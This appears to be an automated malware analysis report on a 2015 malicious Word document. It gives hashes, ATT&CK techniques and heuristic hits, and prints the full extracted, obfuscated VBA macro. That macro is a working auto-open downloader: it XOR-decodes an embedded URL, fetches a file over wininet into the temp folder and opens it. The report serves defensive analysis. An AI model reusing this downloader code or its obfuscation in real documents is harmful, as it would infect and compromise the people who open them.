Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d56f0483ffe05f3…

MALICIOUS

Office (OLE)

Size: 60.0 KB · Created: 2015-01-19 16:07:00 · Authoring application: Microsoft Office Word · First seen: 2015-04-15
MD5: 2f5995ceb36a4d52b3bbdbebd15ea9e7 SHA-1: 2ffa3b42b1b0abff94e1184e865abc86d27214c0 SHA-256: 4d56f0483ffe05f36608ce7db51ffb489499d5c328a3dcf43d6551fd29603a79
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment · T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The presence of legacy WordBasic markers and the `autoopen` macro indicates an attempt to automatically execute code upon opening. The `CreateObject` call is a high-confidence indicator of malicious intent, typically used to instantiate objects for downloading or executing further stages. The VBA code is heavily obfuscated (renamed identifiers, XOR-encoded string constants, junk loops), making a precise determination of its final payload difficult, but the overall pattern — in particular the `wininet.dll` declarations aliased to `InternetOpenA`, `InternetOpenUrlA` and `InternetReadFile` in the extracted source, followed by a binary file write and an `.Open` call on the written file — suggests a downloader.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set C21C21C21 = CreateObject(C22C22C22)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7938 bytes
SHA-256: bb572f402661805f9921ddaf331f517decb7ff963ffef51c798a12cdc501f3fb
Preview script
First 1,000 lines of the extracted script
' Module header emitted by the extractor for the document's own code module
' ("ThisDocument"). Attribute lines are VBA project metadata, not executable
' statements; the auto-exec entry point (autoopen) lives in this module.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Thin wrapper: its only statement calls D22D22D22D22 (module PIDLE0), the
' next hop of the call chain. One extra indirection between the auto-exec
' entry point and the payload logic.
Sub InIn()
D22D22D22D22
End Sub

' Auto-execution entry point (matches heuristic OLE_VBA_AUTOOPEN above): runs
' when the document is opened. It does nothing but call InIn, so the full
' chain is autoopen -> InIn -> D22D22D22D22 -> D24D24D24D24 -> C25C25C25 -> C6C6C6.
Sub autoopen()
InIn
End Sub


Attribute VB_Name = "FILE6"

Option Explicit
' Not referenced anywhere in the extracted source shown on this page; looks like filler.
Public Const C1C1C1A = "D25D25D25D25"



' Parameters for the wininet download performed in C16C16C16 below.
' Size of the fixed-length read buffer handed to InternetReadFile (C3C3C3).
Private Const D1D1D1D1 = 8162
' User-agent string passed as the first argument of InternetOpenA (C2C2C2);
' this literal is a network-side artifact worth matching on.
Private Const D2D2D2D2 As String = "D3D3D3D3D3"
' dwAccessType argument of InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT -- TODO confirm against wininet.h
Private Const D4D4D4D4 = 1
' dwFlags argument of InternetOpenUrlA (used in D15D15D15D15); &H4000000 matches
' the documented value of INTERNET_FLAG_NO_CACHE_WRITE -- TODO confirm
Private Const D5D5D5D5 = &H4000000

' Downloads the remote resource whose URL is decoded inside D15D15D15D15 and
' writes the raw bytes to the local path D6D6D6D6. Returns True only when the
' accumulated body has nonzero length (D12D12D12D12 <> 0), otherwise False.
' Win32 calls are the wininet.dll aliases declared in module PIDLE0:
'   C2C2C2 = InternetOpenA, C3C3C3 = InternetReadFile, C1C1C1 = InternetCloseHandle.
' Analyst notes: the two For loops are junk that never fire; the first read
' copies the whole fixed-length buffer (not just the bytes read) into the body,
' so a short first chunk may leave padding in the dropped file -- worth keeping
' in mind when examining files written by this routine.
Public Function C16C16C16 _
(ByVal D6D6D6D6 As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim D7D7D7D7 As LongPtr, D8D8D8D8 As LongPtr
    #Else
        Dim D7D7D7D7 As Long, D8D8D8D8 As Long
    #End If
    ' D10: bytes read per InternetReadFile call; C33: fixed 8162-char read buffer;
    ' D9: accumulated response body; D11: VBA file number; D12: body length used as the success flag.
    Dim D10D10D10D10 As Long
    Dim C33C33C33 As String * D1D1D1D1, D9D9D9D9 As String
    Dim D11D11D11D11 As Integer, D12D12D12D12 As Double
    ' InternetOpenA(agent = D2D2D2D2, accessType = D4D4D4D4, proxy = null, bypass = null, flags = 0)
    D7D7D7D7 = C2C2C2(D2D2D2D2, D4D4D4D4, vbNullString, vbNullString, 0)
    If D7D7D7D7 = 0 Then
        Exit Function
    End If
    ' Declared but never used.
    Dim FiGaMan As Boolean
    
    ' D15D15D15D15 stores an InternetOpenUrlA handle for the decoded URL in D8;
    ' its Boolean result is ignored (empty If body).
    If D15D15D15D15(D8D8D8D8, D7D7D7D7) Then
    End If
    If D8D8D8D8 = 0 Then
        D12D12D12D12 = 0
    Else
        ' First read; the entire buffer is copied, then chunks are read until 0 bytes come back.
        C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
        D9D9D9D9 = C33C33C33
        Do While D10D10D10D10 <> 0
            C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
            
            Dim Z1z1Z1z1Z1z1 As Integer
            
' Junk loop: counter runs 110..111, so the End statement can never trigger.
For Z1z1Z1z1Z1z1 = 110 _
To 111
If Z1z1Z1z1Z1z1 = 1000 Then _
End
Next Z1z1Z1z1Z1z1
            
            ' Append only the bytes actually read from the fixed-length buffer.
            D9D9D9D9 = D9D9D9D9 + Mid(C33C33C33, 1, D10D10D10D10)
        Loop
            ' D13D13D13D13 is Len(); nonzero length is the success condition. Then write the body as binary.
            D12D12D12D12 = D13D13D13D13(D9D9D9D9): D11D11D11D11 = FreeFile
        Open D6D6D6D6 _
            For Binary Access Write _
        Lock Write _
        As #D11D11D11D11
        Put #D11D11D11D11, _
                , D9D9D9D9
        Dim S1s1S1s1S1s1S1s1 As _
        Long
            ' Junk loop, same pattern as above (111..112, test against 2000).
            For S1s1S1s1S1s1S1s1 = 111 To 112
    If S1s1S1s1S1s1S1s1 = 2000 Then _
    End
Next S1s1S1s1S1s1S1s1
        Close #D11D11D11D11
    End If
    ' InternetCloseHandle on the URL handle, then on the session handle.
    C1C1C1 D8D8D8D8
    C1C1C1 D7D7D7D7
    D9D9D9D9 = ""
    If D12D12D12D12 Then
        C16C16C16 = True
    End If
End Function


' Trivial wrapper around Len(), hiding the builtin behind an obfuscated name.
' Used by C16C16C16 (download-size check) and C8C8C8 (string decoder).
Public Function D13D13D13D13(D14D14D14D14 As String) As Long
D13D13D13D13 = Len(D14D14D14D14)
End Function


Attribute VB_Name = "PIDLE0"

' wininet.dll imports under obfuscated names. The Alias strings are the real
' export names and are the clearest static indicator on this page that the
' macro is a downloader:
'   C1C1C1 = InternetCloseHandle
'   C2C2C2 = InternetOpenA
'   C3C3C3 = InternetReadFile
'   C4C4C4 = InternetOpenUrlA
' The 64-bit (PtrSafe/LongPtr) and 32-bit (Long) variants differ only in handle
' width; the line continuations in the first branch carry no semantic difference.
#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
C1C1C1 Lib _
"wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
Public _
Declare _
PtrSafe _
Function _
C2C2C2 Lib _
"wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
Public _
Declare _
PtrSafe _
Function _
C3C3C3 Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
C4C4C4 Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
#Else
' 32-bit declarations of the same four exports.
Public Declare Function C1C1C1 Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
Public Declare Function C2C2C2 Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
Public Declare Function C3C3C3 Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public Declare Function C4C4C4 Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
#End If




' Instantiates a COM object whose ProgID is decoded at runtime from C10C10C10
' with key C9C9C9 (module IDL4) through the XOR decoder C8C8C8. This is the
' CreateObject call matched by OLE_VBA_CREATEOBJ. The decoded ProgID is not
' shown in this report; the methods later invoked on the object (FileExists,
' DeleteFile, GetSpecialFolder) are those of Scripting.FileSystemObject --
' confirm by decoding C10C10C10.
Public Function C21C21C21() As Object
Dim C22C22C22 As String
C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
Set C21C21C21 = CreateObject(C22C22C22)
End Function


' Second hop of the call chain (called from InIn). The For loop is junk
' (1101..1110, the End on 1111 never triggers); D23D23D23D23 = 111 is passed
' to D24D24D24D24, which ignores its argument.
Sub D22D22D22D22()
        Dim D23D23D23D23 As Long

    Dim D21D21D21D21S As Integer
For D21D21D21D21S = 1101 To 1110
If D21D21D21D21S = 1111 Then End
Next D21D21D21D21S
D23D23D23D23 = 111
D24D24D24D24 (D23D23D23D23)

End Sub

Attribute VB_Name = "IDL4"


' Obfuscated string table. Each hex-string constant is decoded by C8C8C8
' (byte-wise XOR against the cycling key C9C9C9). Plaintext values are not
' shown in this report. Usage sites:
'   C18C18C18 -> ProgID of the object whose .Open is called on the dropped file (C6C6C6)
'   C19C19C19 -> file name appended to the special-folder path (C6C6C6)
'   C20C20C20 -> URL argument of InternetOpenUrlA (D15D15D15D15)
'   C10C10C10 -> ProgID for CreateObject in C21C21C21
' Decoding these four constants yields the network and host IoCs for this sample.
Public Const C18C18C18 = "102B262F2F6A053434282D2725372A2C2D"
Public Const C19C19C19 = "1F2A3737263C30756A706A213C26"
Public Const C20C20C20 = "2B373733796B6B25282C253D2537222F222E222C6A272B296B7772756C7272776D232D22"
Public Const C10C10C10 = "1020312A33302D2A236A022D2826103A303726290B262E213730"
' XOR key (14 characters); C8C8C8 indexes it at (i Mod 14) + 1.
Public Const C9C9C9 = "CCCCCCDDDDDDDD"

' Wrapper around CAILEIGH.FileExists(CAILYN); returns the same Boolean the
' method does. Called twice from C6C6C6: once before deleting a stale copy of
' the drop path and once (result ignored) after the download.
Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
' Opens the download URL. CALLA is the InternetOpenA session handle; CALIDA
' receives the InternetOpenUrlA (C4C4C4) handle, or 0 on failure. The URL is
' decoded from C20C20C20 with key C9C9C9 at call time, so it never appears in
' clear text in the stored source. Always returns True -- the caller
' (C16C16C16) tests the handle, not the return value.
#If VBA7 _
    And Win64 Then
       Public Function D15D15D15D15(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
    #Else
       Public Function D15D15D15D15(ByRef CALIDA As Long, CALLA As Long) As Boolean
    #End If
Dim CALLIDORA As String
    ' Decoded URL (plaintext not shown in this report).
    CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
    
    ' InternetOpenUrlA(hInternet = CALLA, url = CALLIDORA, headers = null, headersLen = 0, flags = D5D5D5D5, context = 0)
                CALIDA _
    = C4C4C4 _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    D5D5D5D5, 0)
    D15D15D15D15 = True
End Function



' Module "M": holds the string decoder (C8C8C8) and the payload driver (C6C6C6).
Attribute VB_Name = "M"


' Returns C23C23C23.GetSpecialFolder(2). If C23C23C23 is a
' Scripting.FileSystemObject (see C21C21C21), 2 selects the temporary folder --
' confirm once the ProgID constant is decoded.
Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
End Function
' Third hop of the call chain. The CALEIGH argument and the literal
' "CACACARDRDRDRD" are both unused (C25C25C25 ignores its parameter) --
' decoy plumbing on the way to C6C6C6.
Sub D24D24D24D24(CALEIGH As Long)

C25C25C25 ("CACACARDRDRDRD")
End Sub


' String decoder used for every obfuscated constant in module IDL4.
' D16D16D16D16 is the key, D17D17D17D17 a hex-encoded ciphertext. For byte i
' (1-based): plaintext(i) = hexbyte(i) Xor Asc(key((i Mod Len(key)) + 1)).
' Note the key index starts at position 2 and wraps to 1, i.e. the key is
' effectively rotated by one. The junk For loop never fires. Running the IDL4
' constants through this routine recovers the URL, drop-file name and ProgIDs
' (not shown in this report).
Public Function C8C8C8(D16D16D16D16 As String, D17D17D17D17 As String) As String
    
    Dim D18D18D18D18 As Integer
    Dim D19D19D19D19 As Integer
    
    
    Dim W1w1W1w1W1w1W1w1 As _
    Long
' Junk loop (1110..1111, test against 1000): the End never executes.
For W1w1W1w1W1w1W1w1 = 1110 To 1111
If W1w1W1w1W1w1W1w1 = 1000 Then _
End
Next W1w1W1w1W1w1W1w1
    ' Number of encoded bytes = hex-string length / 2 (D13D13D13D13 is Len).
    Dim D30D30D30D30 As Long
    D30D30D30D30 = D13D13D13D13(D17D17D17D17)
    D30D30D30D30 = D30D30D30D30 / 2
    Dim D20D20D20D20 As Long
    Dim D21D21D21D21 As String
    For D20D20D20D20 = 1 _
    To _
    D30D30D30D30
        ' D18: i-th ciphertext byte parsed from two hex digits.
        D18D18D18D18 = Val("&H" & _
        (Mid$(D17D17D17D17, _
        (2 * D20D20D20D20) - 1, 2)))
        ' D19: key byte at cycling position (i Mod Len(key)) + 1.
        D19D19D19D19 = Asc(Mid$(D16D16D16D16, _
        ((D20D20D20D20 Mod D13D13D13D13(D16D16D16D16)) + 1), 1))
        D21D21D21D21 = D21D21D21D21 + Chr(D18D18D18D18 Xor D19D19D19D19)
    Next D20D20D20D20
   C8C8C8 = D21D21D21D21
End Function

' Fourth hop: ignores C24C24C24 and calls C6C6C6. Declared as a Function but
' never assigns a return value.
Public Function C25C25C25(C24C24C24 As String)
C6C6C6
End Function

' Payload driver, reached from autoopen via InIn -> D22D22D22D22 -> D24D24D24D24 -> C25C25C25.
' Sequence:
'   1. C7C7C7 = object created by C21C21C21 (CreateObject on the decoded C10C10C10 ProgID).
'   2. C11C11C11 = C7C7C7.GetSpecialFolder(2) via C5C5C5 (temporary folder if
'      the object is a FileSystemObject -- confirm from the decoded ProgID).
'   3. C15C15C15 = folder & decoded C19C19C19 => full path of the dropped file.
'   4. Delete any existing file at that path, then download into it (C16C16C16).
'   5. CreateObject on the decoded C18C18C18 ProgID and call .Open with the path.
' Analyst notes: the download result and the post-download existence check are
' both discarded (empty If bodies), so step 5 runs even when the download
' failed. The dropped path and the two decoded ProgIDs are the host-based
' indicators to recover from this routine.
Public Function C6C6C6()

Dim C7C7C7  As Object
Set C7C7C7 = C21C21C21
Dim C11C11C11 As Object
Set C11C11C11 = C5C5C5(C7C7C7)

Dim C15C15C15
Dim C12C12C12
' Decoded drop-file name (plaintext not shown in this report).
C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
' Concatenating the folder object uses its default property -- presumably its path; verify.
C15C15C15 = C11C11C11 & C12C12C12


' Remove a stale copy before downloading.
If CADY(C7C7C7, C15C15C15) Then
C7C7C7. _
DeleteFile C15C15C15
End If
' Download into the drop path; Boolean result discarded.
If C16C16C16(C15C15C15) Then
End If
' Existence re-check; result discarded.
If CADY(C7C7C7, C15C15C15) Then
End If
Dim C17C17C17
' Hands the dropped file to the object decoded from C18C18C18; what .Open does
' depends on that ProgID -- confirm by decoding.
Set C17C17C17 = CreateObject _
(C8C8C8 _
(C9C9C9, C18C18C18))
C17C17C17.Open C15C15C15
End Function



' UserForm module with an attribute header only -- no procedures were present
' in the extracted source. The VB_Base GUIDs are the only distinctive values here.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AF9D3870-6EF5-41CB-B46D-5784EA7A2347}{8811CEEA-2C99-497E-823B-ECCB0AAE1CD4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Second empty UserForm module: attribute header only, no procedures in the
' extracted source.
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{DD4C0798-F0D1-405D-89FD-12933BDBD567}{1C85D6B9-0A1E-47C1-B4FB-28136EB24322}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False